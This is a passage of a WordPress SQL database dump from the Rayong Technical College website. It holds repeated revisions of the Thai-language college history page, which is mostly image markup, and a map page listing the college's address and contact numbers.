letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-952 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /></h3>\r\n<h3><img class=\"alignnone wp-image-1200\" style=\"font-size: 16px;\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"200\" height=\"74\" /></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignnone wp-image-1204\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"200\" height=\"74\" /></h3>\r\n<h3><img class=\"alignnone wp-image-1203\" style=\"font-size: 16px; font-weight: 400;\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"200\" height=\"78\" /></h3>\r\n<img class=\"alignnone wp-image-1202\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"200\" height=\"76\" />\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignnone wp-image-1201\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"200\" height=\"75\" /><img class=\"alignleft wp-image-953 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h3>\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-954 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" />\r\n\r\n \r\n\r\n<img class=\"size-full wp-image-3064 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-3066 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-03-44.jpg\" alt=\"\" width=\"442\" height=\"323\" />\r\n\r\n<img class=\"aligncenter wp-image-3065 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-3073 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-47-11.jpg\" alt=\"\" width=\"266\" height=\"53\" />\r\n\r\n<img class=\"wp-image-3076 aligncenter\" src=\"/wp-content/uploads/2018/06/biodiversity-21597-1-300x225.jpg\" alt=\"\" width=\"600\" height=\"450\" />\r\n\r\n<img class=\"size-full wp-image-3074 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-54-14.jpg\" alt=\"\" width=\"181\" height=\"55\" />\r\n\r\n<img class=\"alignleft wp-image-3077 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-05-19.jpg\" alt=\"\" width=\"836\" height=\"326\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-06-18 16:16:38', '2018-06-18 09:16:38', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(3084, 3, '2018-06-18 16:17:02', '2018-06-18 09:17:02', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n \r\n\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-952 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /></h3>\r\n<h3><img class=\"alignnone wp-image-1200\" style=\"font-size: 16px;\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"200\" height=\"74\" /></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignnone wp-image-1204\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"200\" height=\"74\" /></h3>\r\n<h3><img class=\"alignnone wp-image-1203\" style=\"font-size: 16px; font-weight: 400;\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"200\" height=\"78\" /></h3>\r\n<img class=\"alignnone wp-image-1202\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"200\" height=\"76\" />\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignnone wp-image-1201\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"200\" height=\"75\" /><img class=\"alignleft wp-image-953 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h3>\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-954 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" />\r\n\r\n \r\n\r\n<img class=\"size-full wp-image-3064 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-3066 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-03-44.jpg\" alt=\"\" width=\"442\" height=\"323\" />\r\n\r\n<img class=\"aligncenter wp-image-3065 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-3073 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-47-11.jpg\" alt=\"\" width=\"266\" height=\"53\" />\r\n\r\n<img class=\"wp-image-3076 aligncenter\" src=\"/wp-content/uploads/2018/06/biodiversity-21597-1-300x225.jpg\" alt=\"\" width=\"600\" height=\"450\" />\r\n\r\n<img class=\"size-full wp-image-3074 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-54-14.jpg\" alt=\"\" width=\"181\" height=\"55\" />\r\n\r\n<img class=\"alignleft wp-image-3077 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-05-19.jpg\" alt=\"\" width=\"836\" height=\"326\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-06-18 16:17:02', '2018-06-18 09:17:02', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(3085, 3, '2018-06-18 16:17:40', '2018-06-18 09:17:40', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n \r\n\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-952 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /></h3>\r\n<h3><img class=\"alignnone wp-image-1200\" style=\"font-size: 16px;\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"200\" height=\"74\" /></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignnone wp-image-1204\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"200\" height=\"74\" /></h3>\r\n<h3><img class=\"alignnone wp-image-1203\" style=\"font-size: 16px; font-weight: 400;\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"200\" height=\"78\" /></h3>\r\n<img class=\"alignnone wp-image-1202\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"200\" height=\"76\" />\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignnone wp-image-1201\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"200\" height=\"75\" /><img class=\"wp-image-953 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h3>\r\n<img class=\"wp-image-954 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" />\r\n\r\n \r\n\r\n<img class=\"size-full wp-image-3064 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-3066 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-03-44.jpg\" alt=\"\" width=\"442\" height=\"323\" />\r\n\r\n<img class=\"aligncenter wp-image-3065 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-3073 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-47-11.jpg\" alt=\"\" width=\"266\" height=\"53\" />\r\n\r\n<img class=\"wp-image-3076 aligncenter\" src=\"/wp-content/uploads/2018/06/biodiversity-21597-1-300x225.jpg\" alt=\"\" width=\"600\" height=\"450\" />\r\n\r\n<img class=\"size-full wp-image-3074 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-54-14.jpg\" alt=\"\" width=\"181\" height=\"55\" />\r\n\r\n<img class=\"wp-image-3077 size-full aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-05-19.jpg\" alt=\"\" width=\"836\" height=\"326\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-06-18 16:17:40', '2018-06-18 09:17:40', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(3086, 3, '2018-06-18 16:18:01', '2018-06-18 09:18:01', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n<h4></h4>\r\n \r\n\r\n \r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-952 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /></h3>\r\n<h3><img class=\"alignnone wp-image-1200\" style=\"font-size: 16px;\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"200\" height=\"74\" /></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignnone wp-image-1204\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"200\" height=\"74\" /></h3>\r\n<h3><img class=\"alignnone wp-image-1203\" style=\"font-size: 16px; font-weight: 400;\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"200\" height=\"78\" /></h3>\r\n<img class=\"alignnone wp-image-1202\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"200\" height=\"76\" />\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"alignnone wp-image-1201\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"200\" height=\"75\" /><img class=\"wp-image-953 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h3>\r\n<img class=\"wp-image-954 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" />\r\n\r\n<img class=\"size-full wp-image-3064 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-3066 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-03-44.jpg\" alt=\"\" width=\"442\" height=\"323\" />\r\n\r\n<img class=\"aligncenter wp-image-3065 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-3073 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-47-11.jpg\" alt=\"\" width=\"266\" height=\"53\" />\r\n\r\n<img class=\"wp-image-3076 aligncenter\" src=\"/wp-content/uploads/2018/06/biodiversity-21597-1-300x225.jpg\" alt=\"\" width=\"600\" height=\"450\" />\r\n\r\n<img class=\"size-full wp-image-3074 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-54-14.jpg\" alt=\"\" width=\"181\" height=\"55\" />\r\n\r\n<img class=\"wp-image-3077 size-full aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-05-19.jpg\" alt=\"\" width=\"836\" height=\"326\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-06-18 16:18:01', '2018-06-18 09:18:01', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(3087, 3, '2018-06-18 16:19:17', '2018-06-18 09:19:17', '<h3><img class=\"wp-image-947 aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1000\" height=\"419\" /></h3>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-952 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /><img class=\"wp-image-953 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h3>\r\n<img class=\"wp-image-954 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"831\" height=\"576\" />\r\n\r\n<img class=\"size-full wp-image-3064 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-3066 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-03-44.jpg\" alt=\"\" width=\"442\" height=\"323\" />\r\n\r\n<img class=\"aligncenter wp-image-3065 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-3073 size-full\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-47-11.jpg\" alt=\"\" width=\"266\" height=\"53\" />\r\n\r\n<img class=\"wp-image-3076 aligncenter\" src=\"/wp-content/uploads/2018/06/biodiversity-21597-1-300x225.jpg\" alt=\"\" width=\"600\" height=\"450\" />\r\n\r\n<img class=\"size-full wp-image-3074 aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-17-54-14.jpg\" alt=\"\" width=\"181\" height=\"55\" />\r\n\r\n<img class=\"wp-image-3077 size-full aligncenter\" src=\"/wp-content/uploads/2018/06/17-5-2561-18-05-19.jpg\" alt=\"\" width=\"836\" height=\"326\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-06-18 16:19:17', '2018-06-18 09:19:17', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(3088, 3, '2018-06-19 13:22:26', '2018-06-19 06:22:26', '<div class=\"colophon-column\">\r\n<h3 class=\"copyright\"><strong>วิทยาลัยเทคนิคระยอง Rayong Technical College</strong></h3>\r\n</div>\r\n<div class=\"colophon-column\">\r\n<h3 class=\"site-info\"><strong>086/13 ถ. ตากสินมหาราช ต. ท่าประดู่ อ. เมืองระยอง จ. ระยอง 21000 </strong></h3>\r\n<h3 class=\"site-info\"><strong>โทร 038-611192 </strong></h3>\r\n<h3 class=\"site-info\"><strong>แฟกซ์ 038-870717</strong></h3>\r\n<h3><strong>พิกัด <a href=\"https://www.google.co.th/maps/place/12%C2%B040\'00.6%22N+101%C2%B016\'19.1%22E/@12.666835,101.2697803,17z/data=!3m1!4b1!4m6!3m5!1s0x0:0x0!7e2!8m2!3d12.6668354!4d101.2719688?hl=en\">12.666835, 101.271969</a></strong></h3>\r\n<div></div>\r\n<div></div>\r\n</div>\r\n<a href=\"https://www.google.co.th/maps/dir//Rayong+Technical+College,+086%2F13+Taksin+Maharat,+Tambon+Tha+Pradu,+Amphoe+Mueang+Rayong,+Chang+Wat+Rayong+21000/@12.6252505,101.3071709,11.13z/data=!4m9!4m8!1m0!1m5!1m1!1s0x3102fc182fea834b:0x4ed7d262b47bd579!2m2!1d101.2721078!2d12.6669973!3e0?hl=en\"><img class=\"aligncenter wp-image-3089\" src=\"/wp-content/uploads/2018/06/6-18-2018-1-07-46-PM.png\" alt=\"\" width=\"1500\" height=\"1061\" /></a>\r\n\r\n ', 'แผนที่ตั้งวิทยาลัยฯ', '', 'publish', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%97%e0%b8%b5%e0%b9%88%e0%b8%95%e0%b8%b1%e0%b9%89%e0%b8%87%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b8%af', '', '', '2018-06-19 13:24:39', '2018-06-19 06:24:39', '', 0, 'http://www.technicrayong.ac.th/?page_id=3088', 0, 'page', '', 0),
(3089, 3, '2018-06-19 13:10:21', '2018-06-19 06:10:21', '', '6-18-2018 1-07-46 PM', '', 'inherit', 'closed', 'closed', '', '6-18-2018-1-07-46-pm', '', '', '2018-06-19 13:10:21', '2018-06-19 06:10:21', '', 3088, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/6-18-2018-1-07-46-PM.png', 0, 'attachment', 'image/png', 0),
(3090, 3, '2018-06-19 13:21:24', '2018-06-19 06:21:24', '', 'Map Rayong Technical College eng', '', 'inherit', 'closed', 'closed', '', 'map-rayong-technical-college-eng', '', '', '2018-06-19 13:21:24', '2018-06-19 06:21:24', '', 3088, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/Map-Rayong-Technical-College-eng.jpg', 0, 'attachment', 'image/jpeg', 0),
